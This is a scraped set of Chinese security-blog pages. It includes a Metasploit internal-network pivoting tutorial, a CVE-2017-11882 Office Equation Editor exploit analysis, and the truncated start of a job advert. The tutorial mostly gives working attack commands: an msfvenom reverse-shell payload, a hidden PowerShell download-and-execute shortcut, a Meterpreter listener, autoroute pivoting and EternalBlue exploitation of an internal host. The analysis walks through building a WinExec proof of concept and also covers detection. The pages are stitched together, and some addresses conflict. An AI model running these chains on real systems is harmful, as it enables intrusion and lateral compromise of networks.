注:可能会有小伙伴会问,为什么不直接使用MSF生产一个反弹shell就好了,说的没错直接使用MSF生产一个反弹shell也是可以的,只是可能如果服务器上有相关的杀软的话,可能就会被干掉,我这里直接使用这一刚刚暴露出的漏洞其有很好的过杀软的作用,且其可用利用系统访问范围几乎是全覆盖的,同时本人是想把此漏洞的实战利用价值和思维也带给大家。

2.1.2 上传search.ps1到目标主机

生成完ps1 shell后,想办法将search.ps1上传到目标服务器,为下一步漏洞的触发调用做好准备,这里笔者就直上传了到服务器桌面。

注:可能有很多小伙伴看过网上的教程,对此有些疑问,网上给出的使用方法,一般是将这shell脚本通过web服务发布到网上,然后利用用户点击快捷方式的时候触发shell下载,然后执行shell获取一个shell反弹。

我这里的实际环境是,我们已经获取了目标站点的shell,可以直接上传这个shell,然后让然漏洞利用直接在本地执行,无需再去网络上下载。

2.1.3 本地生成一个powershell 本地快捷方式

首先,输入快捷方式调用的对象位置,具体的powershell 本地调用方式的语句如下:

powershell -windowstyle hidden -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘C:UsersMylesDesktopshell.ps1’);test.ps1”

随后,我将这个powershell快捷方式命名为poweshell.exe。

2.1.4 开启MSF本地监听

在LNK漏洞环境都准备完毕后,接下就是开启远端的监听了,等待漏洞触发反弹出一个shell出来,具体MSF开启端口监听的命令如下。

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
show options
set LHOST 192.168.1.123
set lport 12345
exploit
2.1.5 主动触发漏洞获取反弹shell

MSF监听已经开了,反弹shell也已经上传,现在我们只要主动触发shell反弹即可。即,我们只要双击桌面快捷方式,即可反弹出一个shell到远端的MSF监听,我很快就可以看到MSF的会话监听已经打开,shell已经反弹成功,成功获取一个MSF与目标主机的session会话。

再次解惑:

可能前面我们做了这么多工作,还是有小伙伴并不清楚我们要做什么,可能还回吐槽说我们都已经获取目标主机的控制权限了,还要创建个MSF的session会有啥意义呢?

其实我们回到文档的开头,回到标题我们可能就会知道我们为什么要获取一个“目标主机与MSF的session会话”了,我创建这个session就是为了能使用MSF这个框架对内网的其他主机做进一步的渗透了,有个这个session,我们的外网MSF攻击平台就能利用这个session帮助我们与内网主机的通信提供数据路由转发,下面一个节会详细给大家介绍有关MSF路由添加功能的实现。

2.2 MSF跳板功能

2.2.1 基本概念

MSF的跳板功能,其实是MSF框架中自带的一个路由转发功能,其实现过程就是MSF框架在已经获取的meterpreter shell的基础上添加一条去往“内网”的路由,此路由的下一跳转发,即网关是MSF攻击平台与被攻击目标建立的一个session会话,具体理解大家可以看见前面的1.2章节的拓扑图。

通过msf添加路由功能,可以直接使用msf去访问原本不能直接访问的内网资源,只要路由可达了那么我们使用msf的强大功能,想干什么就干什么了。

2.2.2 msf 跳板实现过程

2.2.2.1 基本过程

(1)需要有一个已经获取的meterpreter 会话;

(2)获取内网地址网段

(3)在MSF平台上添加去往“内网网段”的路由

2.2.2.2 实现过程

(1) 已经获取一个meterpreter shell

第1个条件,是我们要想办法获取一个MSF攻击平台与目标主机的shell会话(meterpreter),然后利用此会话。具体获取meterpreter会话的方法很多,本演示案列中是以powershell ps1 反弹一个会话为演示,具体内容请见后面复现过程。

MSF 路由添加帮助查询命令如下:

meterpreter > run autoroute -h

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value […]
[*] Usage: run autoroute [-r] -s subnet -n netmask
[*] Examples:
[*] run autoroute -s 10.1.1.0 -n 255.255.255.0 # Add a route to 10.10.10.1/255.255.255.0
[*] run autoroute -s 10.10.10.1 # Netmask defaults to 255.255.255.0
[*] run autoroute -s 10.10.10.1/24 # CIDR notation is also okay
[*] run autoroute -p # Print active routing table
[*] run autoroute -d -s 10.10.10.1 # Deletes the 10.10.10.1/255.255.255.0 route
[*] Use the “route” and “ipconfig” Meterpreter commands to learn about available routes
[-] Deprecation warning: This script has been replaced by the post/multi/manage/autoroute module
(2)获取目标内网地址段

具体获取被攻击目标内网地址网段的命令如下所示:

meterpreter > run get_local_subnets

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value […]
Local subnet: 172.17.0.0/255.255.0.0

由上可以获知,目标内网网段是“172.17.0.0./24”

(3)添加去往目标网段的转发路由

在meterpreter 会话上直接添加去往目标网段的路由,具体添加方法如下所示。

meterpreter > run autoroute -s 172.17.0.0/24

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value […]
[*] Adding a route to 172.17.0.0/255.255.255.0…
[+] Added route to 172.17.0.0/255.255.255.0 via 10.48.8.234
[*] Use the -p option to list all active routes
添加网路由后,我们来查看下路由的添加情况如何,具体命令如下所示:
meterpreter > run autoroute -p

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value […]

Active Routing Table
====================

Subnet Netmask Gateway
—— ——- ——-
172.17.0.0 255.255.255.0 Session 3
注:由以上内容,我们可以看到出添加了一条路由:

目标:172.17.0.0 掩码:255.255.25.0 下一跳网关:Session 3

这里的 Session 3,即当前被攻击目标主机与MSF平台建立的meterperter会话。

OK, MSF平台有了去往内网网段的路由,我们就可以直接使用MSF平台对内网的主机进行进一步的渗透利用了。

三、案列场景复现

3.0 复现场景拓扑

(1)MSF平台:192.168.10.109

(2)目标主机:10.48.8.234

(3)目标网段:10.48.8.0/24

具体复现的场景,就是1.2章节网络环境拓扑。

http://p7.qhimg.com/t01b155a949dd0b499b.png

3.1 打开MSF本地监听

为了接受目标主机反弹回来的meterperter shell,我们需要首先打开一个MSF本地监听端口,等待会话的反弹,具体操作过程如下。

msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.10.109
set lport 12345
exploit
http://p2.qhimg.com/t0108a3fc39945497ae.png

3.2 使用powershell ps1 获取一个meterpreter

3.2.1 生成 powershell ps1攻击载荷

此时我们已经获取了目标主机的windows控制权限,接下来我们直接使用MSF生成一个ps1反弹shell;

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.100.109 lport=12345 -f psh-reflection>/tmp/search.ps1
http://p8.qhimg.com/t010dabab5ee1988be6.png

3.2.2 上传反弹shell到目标主机

在生成反弹shell后,我们就是直接上传search.ps1 攻击载荷到目标主机。

http://p5.qhimg.com/t01229fe9bfdb701cea.png

3.2.3 触发 powershell 反弹shell

利用上传的search.ps1 攻击payload,在目标主机上生成一个powershell 本地快捷方式,然后点击快捷方式触发powershell ps1利用,反弹一个shell会话到MSF平台。有关poershell ps1 快捷方式的语句如下所示(具体详细使用情况可参见章节:2.1.3)。

powershell -windowstyle hidden -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘C:UsersMylesDesktopshell.ps1’);test.ps1”
http://p8.qhimg.com/t01fb4c56f7fb2722e2.png

注:直接复制上面的语句到创建快捷方式的“请键入对象的位置”即可,但是各位自操作时,请注意serach.ps1的物理位置,不要搞错。

3.3 获取内网网段信息

在MSF平台监听端,我们获取反弹的shell后(即session),我们可以直接在meterpreter控制终端进行目标网段信息的查询,具体查询命令如下。

meterpreter > run get_local_subnets

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value […]
Local subnet: 10.48.8.0/255.255.255.0
Local subnet: 169.254.0.0/255.255.0.0
meterpreter >
http://p1.qhimg.com/t01ac2bd46d4e3b9e67.png

通过内网本地路由查询,可以获悉内网网段地址为:10.48.8.0/24

3.4 添加目标网段路由

我们在获知目标内网网段路由为10.48.8.0/24后,接下来就是添加去往目标内网网段(10.48.8.0/24)的静态路由,添加路由的具体命令执行如下。

meterpreter > run autoroute -s 10.48.8.0/24

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value […]
[*] Adding a route to 10.48.8.0/255.255.255.0…
[+] Added route to 10.48.8.0/255.255.255.0 via 10.48.8.234
[*] Use the -p option to list all active routes
meterpreter >
http://p5.qhimg.com/t0150bfa9633262b9de.png

3.5 内网主机渗透

我们将去往内网的路由打通后,接下来就可以使用MSF平台直接对内网主机扫描和进行各种高危漏洞的直接渗透利用了。

3.5.1 退到后台

首先我们需要退到MSF攻击平台的操作面,为后面调用其他攻击模块做好准备,具体操作如下。

meterpreter > background
[*] Backgrounding session 2…
msf exploit(handler) > sessions -i

Active sessions
===============

Id Type Information Connection
— —- ———– ———-
2 meterpreter x64/windows admin-PCadmin @ ADMIN-PC 192.168.10.109:12345 -> 10.48.8.234:53462 (10.48.8.234)
http://p3.qhimg.com/t0173402d9b5c51ef2a.png

3.5.2 漏洞主机发现

通过目标主机,我们可以直接使用MSF下的扫描模块进行主机发现与扫描,这里我们直接使用最近流行的“永恒之蓝”漏洞扫描模块进行网络主机漏洞扫描。

use auxiliary/scanner/smb/smb_ms17_010
show options
set rhosts 10.48.8.0/24
set threads 50
run
http://p6.qhimg.com/t013fb3403fc8d33c28.png

通过主机漏洞扫描,我们发现10.48.8.236主机存在一个MS17-010漏洞。

3.5.3 调用攻击载荷

通过目标主机我们扫描发现内网有台主机存在MS17-010漏洞(10.48.8.236),我们现在直接使用使用MSF平台调通“永恒之蓝”漏洞攻击载荷,进行攻击获取主机控制权限,操作过程如下。

msf exploit(handler) > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > set rhost 10.48.8.236
rhost => 10.48.8.236
msf exploit(ms17_010_eternalblue) > exploit
http://p3.qhimg.com/t01a8ed5d24093b5563.png

http://p7.qhimg.com/t019e01c297dd67bdb6.png

自此我们使用 “MSF 的跳转路由转发”,直接使用外网的MSF平台实现对内网私有主机的攻击演示结束,好了打完收工,各位看客有钱的捧个钱场,没钱的捧个人场,开个玩笑。

注:以上内容仅为个人学习所用,请勿用于非法攻击。

学习参考

http://www.metasploit.cn/thread-1644-1-1.html

http://www.91ri.org/9560.html

本文由安全客原创发布
转载,请参考转载声明,注明出处: https://www.anquanke.com/post/id/86505
安全客 – 有思想的安全新媒体
安全知识

myles007 分享到: QQ空间 新浪微博 微信 QQ facebook twitter
|推荐阅读

ARM汇编之堆栈溢出实战分析四(GDB)
2019-02-19 16:00:28

盲眼鹰(APT-C-36):持续针对哥伦比亚政企机构的攻击活动揭露
2019-02-19 14:33:15

从两道CTF实例看python格式化字符串漏洞
2019-02-19 14:30:48

Typora XSS 到 RCE(下)
2019-02-19 11:30:28
|发表评论
发表你的评论吧
昵称
杨教授
换一个
|评论列表
匿名用户 · 2019-01-22 18:05:23 回复
很困惑,图一,MSF在本地内网监听???

Wnltc0 · 2019-01-16 21:33:44 回复
网络卡了一下,,,我不是有意的评论那么多的,,

Wnltc0 · 2019-01-16 21:32:50 回复
大佬,有个小疑问请教下,最后用ms17-010去打内网中的机器时得到的shell是msf去连目标机器对吗?如果想目标机器回连msf的话有办法吗?

Wnltc0 · 2019-01-16 21:32:50 回复
大佬,有个小疑问请教下,最后用ms17-010去打内网中的机器时得到的shell是msf去连目标机器对吗?如果想目标机器回连msf的话有办法吗?

Wnltc0 · 2019-01-16 21:32:50 回复
大佬,有个小疑问请教下,最后用ms17-010去打内网中的机器时得到的shell是msf去连目标机器对吗?如果想目标机器回连msf的话有办法吗?

Wnltc0 · 2019-01-16 21:32:50 回复
大佬,有个小疑问请教下,最后用ms17-010去打内网中的机器时得到的shell是msf去连目标机器对吗?如果想目标机器回连msf的话有办法吗?

Wnltc0 · 2019-01-16 21:32:50 回复
大佬,有个小疑问请教下,最后用ms17-010去打内网中的机器时得到的shell是msf去连目标机器对吗?如果想目标机器回连msf的话有办法吗?

Wnltc0 · 2019-01-16 21:32:50 回复
大佬,有个小疑问请教下,最后用ms17-010去打内网中的机器时得到的shell是msf去连目标机器对吗?如果想目标机器回连msf的话有办法吗?

Wnltc0 · 2019-01-16 21:32:49 回复
大佬,有个小疑问请教下,最后用ms17-010去打内网中的机器时得到的shell是msf去连目标机器对吗?如果想目标机器回连msf的话有办法吗?

threst · 2018-12-17 22:57:35 回复
为什么MSF本地监听可以监听到目标主机,不是内网吗?

Anonymous · 2019-01-22 18:06:24 回复
同困惑???

threst · 2018-12-17 22:57:35 回复
为什么MSF本地监听可以监听到目标主机,不是内网吗?

白猫 · 2018-11-22 19:31:24 回复
最近一直在学内网渗透。作者搭建的靶机环境实战意味非常强。文章写的非常棒。这是一个非常典型的内网渗透环境。首先,外网的主机通过msf配置一个静态路由表直接指向令网服务器。然后利用该静态路由对内网服务器进行漏洞扫描。之后再利用永恒之蓝病毒获取最高权限。这个流程行云流水,学习了。

Mickey牛 · 2018-07-18 02:06:15 回复
大哥牛逼

myles007
这个人太懒了,签名都懒得写一个
文章
8
粉丝
2
TA的文章
【技术分享】linux各种一句话反弹shell总结
2017-10-16 17:47:56
【技术分享】微软 Office Word 无宏命令执行漏洞
2017-10-12 09:58:53
【技术分享】数据库连接池信息泄露引起的主机沦陷实战记录
2017-08-08 14:14:42
【技术分享】使用 MSF 路由转发实现MSF框架的内网渗透
2017-07-28 11:16:13
【技术分享】CSRF 攻击场景分析与重现学习
2017-07-06 10:29:17
输入关键字搜索内容
相关文章
360 | 数字货币钱包APP安全威胁概况
以太坊智能合约安全入门了解一下(下)
对恶意勒索软件Samsam多个变种的深入分析
360 | 数字货币钱包安全白皮书
Json Web Token历险记
揪出底层的幽灵:深挖寄生灵Ⅱ
简单五步教你如何绕过安全狗
热门推荐
安全客Logo
安全客
安全客
关于我们
加入我们
联系我们
用户协议
商务合作
合作内容
联系方式
友情链接
内容须知
投稿须知
转载须知
合作单位
安全客
安全客
Copyright © 360网络攻防实验室 All Rights Reserved 京ICP备08010314号-66
Loading…0daybank

CVE-2017-11882

首页
文章

漏洞
SRC导航
内容精选

输入关键词搜索

APP 登录| 注册
【漏洞分析】CVE-2017-11882漏洞分析、利用及动态检测
阅读量 237221 | 评论 4 稿费 1200

分享到: QQ空间 新浪微博 微信 QQ facebook twitter
发布时间:2017-11-24 18:44:37
http://p6.qhimg.com/t01574b7ebbcfa43e38.png

作者:@银雁冰

预估稿费:1200RMB

(本篇文章享受双倍稿费 活动链接请点击此处)

投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿

传送门

【漏洞分析】Microsoft Office内存损坏漏洞(CVE–2017–11882)分析

前言

CVE-2017-11882是微软本月公布的一个远程执行漏洞,通杀目前市面上的所有office版本及Windows操作系统(包括刚刚停止支持的Office 2007)。该漏洞的成因是EQNEDT32.EXE进程在读入包含MathType的ole数据时,在拷贝公式字体名称时没有对名称长度进行校验,从而造成栈缓冲区溢出,是一个非常经典的栈溢出漏洞。上次出现这么典型的office栈溢出漏洞是著名的CVE-2012-0158。本文将深入分析该漏洞背后的机制,并在此基础上讲一下poc的构造方法,利用思路及动态检测方式。

漏洞原理分析

调试环境: windows7_sp1_x86 + office 2007 x86 + windbg 6.11 x86

EQNEDT32.EXE version: 2000.11.9.0

该漏洞和经典的CVE-2012-0158一样,位于实现OLE接口的IPersistStorage::Load函数中。sub_40415B为ole的初始化过程,如下图1所示,它调用了sub_40440A函数,sub_40440A的主要作用是在初始化EQNEDT32.EXE实现的COM接口的各个函数指针。

https://p5.ssl.qhimg.com/t0107c4c1102c3f7cc4.png

图1

通过工具我们可以看到EQNEDT32.EXE实现了如下接口(图2):

https://p4.ssl.qhimg.com/t016bee7432345ab9c6.png

图2

我们可以在EQNEDT32.EXE文件里面看到对这些接口的比较和使用,如图3所示:

https://p4.ssl.qhimg.com/t0147fbab22e0f50baa.png

图3

我们重点关注IPersistStorage接口,任何ole对象必须实现该接口,图4为微软对该接口的说明:

https://p1.ssl.qhimg.com/t01ea2b18944c196a32.png

图4

通过简单的逆向工程,我们可以看到IPersistStorage接口的各个方法指针在 sub_40440A中被初始化,如图5所示:

https://p3.ssl.qhimg.com/t0175910fa8dde5db83.png

图5

图5中红框圈出的IPersistStorage::Load方法的主要用途是用来读入ole数据,在EQNEDT32.EXE中实现该方法后,即可被调用以读入MathType对应的ole数据,我们来看一下这个Load函数内部是怎么实现的,我们可以看到该函数的核心逻辑是打开并读入一个叫做“Equation Native”的流的数据(图6-1),在此基础上进一步读入MathType数据(图6-2),图6-3为动态调试记录:

https://p3.ssl.qhimg.com/t0148f4ea46d0e0e2b5.png

图6-1

https://p4.ssl.qhimg.com/t011f7b1907a0dfe562.png

图6-2

https://p2.ssl.qhimg.com/t019eca0768cba6df2a.png

图6-3

我们来看一下这个“Equation Native”流来自哪里(图7),通过分析ole文件,我们可以看到该流的数据由用户所提供,正常情况下,流里面的数据代表一个MathType的公式,而恶意攻击者构造的数据可以如图7所示:

https://p0.ssl.qhimg.com/t018c904b4cbef3564a.png

图7

该漏洞的直接触发原因为:在读入公式的Font Name数据时,在将Name拷贝到一个函数内局部变量的时候没有对Name的长度做校验,从而造成栈缓冲区溢出,如图8所示。从图9可以看出,函数给SrcStr变量分配的大小是0x24个字节,超过该大小就会造成溢出,从而覆盖不远处的eip,达到劫持程序执行流的目的,从StrStr开始算起,eip的位置为+0x2c,即44,再往前覆盖就是调用参数。

https://p3.ssl.qhimg.com/t0114fd5bc4057fcb53.png

图8

https://p3.ssl.qhimg.com/t014951282b95f71e22.png

图9

整个漏洞执行过程的步骤如图10所示

https://p3.ssl.qhimg.com/t01c9e087d50b7c4858.png

图10

https://p2.ssl.qhimg.com/t018ea180c05d9f327e.png

图11

https://p0.ssl.qhimg.com/t01db158c5f85950406.png

图12

https://p4.ssl.qhimg.com/t017e2861a6db6f9958.png

图13

从零开始构造POC

上面已经把这个漏洞的原理和触发流程讲清楚了,下面我们尝试构造一个poc。由于该漏洞涉及到MathType公式数据在OLE中的结构,所以我们需要熟悉其结构分布。根据网上公开的数据结构,整个“Equation Native”的数据构成为:

Equation Native Stream Data = EQNOLEFILEHDR + MTEFData,其中

MTEFData = MTEF header + MTEF Byte Stream

下面一个一个来看。

EQNOLEFILEHDR的结构如下(图14-1):

https://p3.ssl.qhimg.com/t01f2c28cca756cf81b.png

图14-1

MTEF header的结构如下(图14-2),实际发现通过office 2007插入的公式其product subversion字段恒定为0x0A,这与下图有所出入:

https://p3.ssl.qhimg.com/t01c22cb6fae5d3c269.png

图14-2

MTEF Byte Stream的结构如下(图14-3),可以看到它由一个SIZE record及后续的一些record构成,各种record的类别如图14-4所示,其中对于本次漏洞相关的Font record的说明如图14-5所示。

https://p3.ssl.qhimg.com/t0166794fa94c554a63.png

图14-3

https://p0.ssl.qhimg.com/t01c507a6e68ca5aedd.png

图14-4

https://p1.ssl.qhimg.com/t01c9ac94f7c88bf8ce.png

图14-5

我们来对照首次被公开的CVE-2017-11882 poc的数据,看一下上述结构的具体对应情况(图15):

https://p4.ssl.qhimg.com/t01f6317d24d2856f0f.png

图15

我们再来看一下漏洞发现者自己给出的poc里面上述结构的对应情况(图16):

https://p0.ssl.qhimg.com/t01b6b9fb3feb424c9a.png

图16

最后我们来看一下一个插入的普通公式的上述结构对应情况(图17),可以看到此时数据中并没有font record:

https://p2.ssl.qhimg.com/t01609a30feb3d342fc.png

图17

通过上面的观察我们已经发现,所有插入的Equation Native数据在截止到SIZE record的数据排布都是一致的,不同之处在于恶意的Equation Native在SIZE record后放了一个Font record,其数据构成为:

Font record = tag(固定为8,占一个字节) + typeface(占一个字节) + style(占一个字节) + font_name(以0x00结尾的字符串)

观察发现typeface和style这两个字节比较随意(两个poc里面这两个字节并不相同),实际构造时,我把两个字节改成其他的一些值(例如全为0)并不影响漏洞的触发。

对Equation Native数据的具体解析

Eqnedt32在如下位置读入font tag(图18-1),图18-2为动态调试时进行的验证。

https://p0.ssl.qhimg.com/t016bdfa879b86af3e9.png

图18-1

https://p2.ssl.qhimg.com/t01876b40341842c2a0.png

图18-2

随后将tag传入sub_43A720函数,并进一步传入其子函数sub_43A87A进行判断,如图19所示:

https://p0.ssl.qhimg.com/t0137816a8a96974c30.png

图19

在sub_43B418函数中,首先读取font record中代表typeface和style的两个字节,如图20所示:

https://p5.ssl.qhimg.com/t01e70588e402f328ea.png

图20

随后的sub_4164FA开始逐个读入字节读入font name的数据,直到遇到一个NULL,如图20所示。读入font name后,再调用sub_4214A6函数进行一些处理(图21),由于前面读入的font name数据过长,从而导致在sub_4214A6函数内部再进入几层调用后导致栈溢出,整个流程我已经在图10中进行概述,这里不再往下展开

https://p3.ssl.qhimg.com/t01247c22f74c02d2a4.png

https://p4.ssl.qhimg.com/t0198530fb645cad1b5.png

图21

从正常插入的ole开始构造poc。为了方便构造poc,我先用word插入了一个正常的Equation.3公式,提取出的Equation Native数据如图17所示,现在开始我要在此基础上构造一个弹出计算器的poc。

首先,直到SIZE record(0x0A)截止的数据都保持不变,将后面的数据替换为font tag(0x08)及其对应的数据(可以看到我将typeface和style这两个字节设为了0),如图22所示,我用从0x01开始的有规律的数据进行填充以方便后面我在栈溢出后对数据偏移进行定位。

https://p3.ssl.qhimg.com/t0146150f27d778e5ff.png

图-22

用修改过的ole替换正常的ole,(对一个docx文件来说,就是用压缩软件替换wordembeddingsoleObject1.bin这个文件,然后重新保存成docx即可,rtf的替换方式稍微有些不同,不过也比较简单),打开后单击界面上的公式即可启动eqnedt32.exe进程。

为了调试,我们需要挂上windbg进行调试。可能有人会问如何用windbg挂上eqnedt32.exe,方法很简单,手动增加一个注册表项,或者用gflag工具设置一下eqnedt32.exe启动时附加windbg即可,具体过程请参考文末给出的链接。

Windbg挂上进程后让其运行,发现执行流在如下位置(图23-1)发生访问违例,可以看到违例数据为0xa2a1a09f(这并不是我们所期待看到的访问违例点),这即为我在图10里面提到的备注1和备注2。问题数据位于图23-2中的蓝色位置。访问违例发生的原因是4217c3处调用的sub_421E39函数内发生栈溢出(覆盖的是父函数的栈,这个溢出点在11月的补丁中并没有修复),导致覆盖了父函数的第一个参数lpLogfont,具体如图23-3所示

https://p5.ssl.qhimg.com/t014dffdd0d9ebe58ac.png

图23

https://p4.ssl.qhimg.com/t0172a6989298f8038f.png

图23-2

https://p1.ssl.qhimg.com/t01708393edd03a6ca5.png

图23-3

搞清楚问题的原因后,我们先确保这里溢出时不覆盖返回地址和第一个参数,我们需要将9B改成00,让数据在拷贝时自然截断,如图24所示,继续进行尝试:

https://p3.ssl.qhimg.com/t011ceb75069cc7b2dd.png

图24

继续尝试,发现此时又在如图25所示的位置发生访问违例:

https://p5.ssl.qhimg.com/t01259d1a19a16d73f3.png

图25

排查发现这是因为调用sub_44C430时父函数(sub_41160F)的第一参数作为sub_44C430函数的第二参数传入导致的(如图26-1,图26-2,图26-3所示),传入前父函数的第一参数已被覆盖,所以sub_44C430在取数据时发生访问违例。

https://p5.ssl.qhimg.com/t018dde83759bc936ab.png

图26-1

https://p1.ssl.qhimg.com/t01c92540dd21947040.png

图26-2

https://p4.ssl.qhimg.com/t013f48286762727306.png

图26-3

再次搞清楚原因之后,我们再对poc的字节码做些修改,我们并不希望sub_41160F的第一个参数被破坏。重新执行样本,在sub_41160F的溢出发生后断下,如图27-1所示,可以看到此时第一参数被覆写为0x3a393837,我们再次修改poc数据,将37改成00,让拷贝在此处截止,修改完后的数据如图27-2所示。

https://p1.ssl.qhimg.com/t01c3c5ad9ef70c9ffa.png

图27-1

https://p1.ssl.qhimg.com/t0171c32659b6c7c618.png

图27-2

再次替换ole,这次终于执行到了我们所期待的地址处,且返回地址已经被我们提供的数据所覆盖,如图28所示:

https://p1.ssl.qhimg.com/t016c05ac6cf4a14fa3.png

图28

现在我们将原先33343536处的数据改成120C4300这个地址(该地址处调用了WinExec),如图29所示:

https://p5.ssl.qhimg.com/t01ce1305d890462b82.png

图-29

再次替换ole,发现执行到所期待的ret栈上的数据已经完全为我们所控制,如图30所示:

https://p5.ssl.qhimg.com/t01e39a0b7a1a2fb667.png

图30

最终,我们只需要将01020304…处的数据替换为任意我们想执行的命令的字符串对应的十六进制即可(可以计算得出cmd的最大长度为44个字节),比如“calc.exe”,如图31所示:

https://p4.ssl.qhimg.com/t0156272419b5872e82.png

图31

最后一次替换ole,411874处的ret语句执行前栈上数据如图32所示,单步执行,最终弹出计算器(图33),并且word进程没有crash:

https://p5.ssl.qhimg.com/t01747428c7915d0287.png

图32

https://p3.ssl.qhimg.com/t01d5cc426cd471682c.png

图33

对该漏洞利用方式的思考

关于自动触发,由于调试时我保存成docx,所以每次都是单击公式触发的。若要自动触发,我们可以将其保存成rtf格式,并且在在ole对象头部增加红色的关键字“{objectobjembobjupdate…”。还可以在pptx文档内插入公式数据对该漏洞进行利用,自动触发方式可以借鉴CVE-2014-4114/CVE-2014-6352的触发方式,用自动播放动画的特性去调用DVerb进行触发,我还没尝试过,不过这是一个很好的思路。

由上面的分析可以推算,WinExec的命令行的最大长度为0x24+0x4(第一个局部变量)+0x4(ebp)=0x2c,所以受到了很多限制。这里提一种有意思的方法,由于ole在实现IPersistStorage::Load方法时一直存在一个缺陷,导致在某些特定条件下下可以将一个ole对象里面存储的文件保存到temp目录(并且文件名可指定),这个机制缺陷在几年前已经被HaifeiLi所吐槽,但微软一直没有修复该问题,感兴趣的同学可以阅读参考链接中他在BlackHar2015上的演讲。

这样一来,我们可以在一个rtf文件中插入两个(或多个)ole,第一个用来将文件写入到temp文件夹,第二个ole利用CVE-2017-11882去执行temp文件夹下面的文件。这样的使用方法和CVE-2014-4114/CVE-2014-6352的方式有异曲同工之妙。目前野外已经出现这类样本,这里也请大家暂时参照网上的方法禁用公式编辑器3.0这一组件,以做好防范工作。

漏洞动态检测及防御

该漏洞的动态防御特别简单,因为是栈缓冲区拷贝时溢出,所以校验待拷贝长度是否超过缓冲区的长度即可,如图34所示,在红框处执行完毕后检查ecx的值,如果大于StrStr缓冲区的长度(0x24),即视为触发漏洞。微软在补丁里面把溢出校验长度设置为0x20,比实际少4个字节,可能为了保险起见吧。

https://p2.ssl.qhimg.com/t01e0307ce9ac33f18b.png

图34

参考链接

《Attacking Interoperability》 https://www.blackhat.com/docs/us-15/materials/us-15-Li-Attacking-Interoperability-An-OLE-Edition.pdf

《IPersistStorage interface》https://msdn.microsoft.com/en-us/library/windows/desktop/ms679731(v=vs.85).aspx

《MathType MTEF v.3(Equation Editor 3.x)》 http://web.archive.org/web/20010304041035/http://mathtype.com:80/support/tech/MTEF3.htm

《How MTEF is Stored in Files and Objects》http://web.archive.org/web/20010304111449/http://mathtype.com:80/support/tech/MTEF_storage.htm

《Skeleton in the closet. MS Office vulnerability you didn’t know about》https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about

《Did Microsoft Just Manually Patch Their Equation Editor Executable? Why Yes, Yes They Did. (CVE-2017-11882)》 https://0patch.blogspot.jp/2017/11/did-microsoft-just-manually-patch-their.html

《How to: Launch the Debugger Automatically》https://msdn.microsoft.com/en-us/library/a329t4ed(v=vs.100).aspx

《CVE-2017-11882》https://github.com/embedi/CVE-2017-11882

本文由安全客原创发布
转载,请参考转载声明,注明出处: https://www.anquanke.com/post/id/87311
安全客 – 有思想的安全新媒体
安全知识

银雁冰 分享到: QQ空间 新浪微博 微信 QQ facebook twitter
|推荐阅读

ARM汇编之堆栈溢出实战分析四(GDB)
2019-02-19 16:00:28

盲眼鹰(APT-C-36):持续针对哥伦比亚政企机构的攻击活动揭露
2019-02-19 14:33:15

从两道CTF实例看python格式化字符串漏洞
2019-02-19 14:30:48

Typora XSS 到 RCE(下)
2019-02-19 11:30:28
|发表评论
发表你的评论吧
昵称
黑帽子
换一个
|评论列表
黑帽子 · 2018-12-07 11:18:21 回复
很强的

360U37404702 · 2017-12-12 19:25:45 回复
您好,想请教一下,图2里面,EQNEDT32.EXE实现的接口是如何查看的,使用的是什么工具?谢谢~~

银雁冰 · 本文作者 · 2017-12-21 10:26:34 回复
GUID-Finder + 在线MSDN文档

yang · 2018-01-23 12:22:22 回复
方便加个联系方式吗?有些问题想请教您,我QQ:1422930734。

银雁冰
这个人太懒了,签名都懒得写一个
文章
7
粉丝
19
TA的文章
对某HWP漏洞样本的shellcode分析
2019-01-22 16:36:34
对某HWP漏洞样本的分析
2018-11-01 11:30:29
Open XML标签解析类漏洞分析思路
2018-03-30 17:03:13
手把手教你复现office公式编辑器内的第三个漏洞
2018-01-15 19:16:00
永远的经典:CVE-2012-0158漏洞分析、利用、检测和总结
2017-12-21 14:09:32
输入关键字搜索内容
相关文章
360 | 数字货币钱包APP安全威胁概况
以太坊智能合约安全入门了解一下(下)
对恶意勒索软件Samsam多个变种的深入分析
360 | 数字货币钱包安全白皮书
Json Web Token历险记
揪出底层的幽灵:深挖寄生灵Ⅱ
简单五步教你如何绕过安全狗
热门推荐
安全客Logo
安全客
安全客
关于我们
加入我们
联系我们
用户协议
商务合作
合作内容
联系方式
友情链接
内容须知
投稿须知
转载须知
合作单位
安全客
安全客
Copyright © 360网络攻防实验室 All Rights Reserved 京ICP备08010314号-66
Loading…0daybank

数字观星

数字观星
首页
文章

漏洞
SRC导航
内容精选

输入关键词搜索

APP 登录| 注册
数字观星招聘安全人才,五倍年终奖加七险一金
阅读量 83126 | 评论 3

分享到: QQ空间 新浪微博 微信 QQ facebook twitter
发布时间:2018-01-25 18:11:28

简历投递邮箱:hr@shuziguanxing.com(请注明来自安全客)

公司介绍
数字观星,专注威胁情报数据分析和大数据运营。国家漏洞库(CNVD)成员单位。团队核心成员来自原总参三部、启明星辰、绿盟、360、天融信等国内外多家安全厂商以及电信运营商等单位,技术研发人员占员工总数的80%以上。

公司官网:http://www.shuziguanxing.com/

工作地点
北京·西直门

招聘岗位
一、安全研究员
工作职责:

1.负责团队项目渗透测试项目及安全技术研究。

2.负责团队的0day漏洞挖掘,以及对出现的0day漏洞事件进行追踪分析。

3.负责团队项目的代码审计工作。

职位要求:

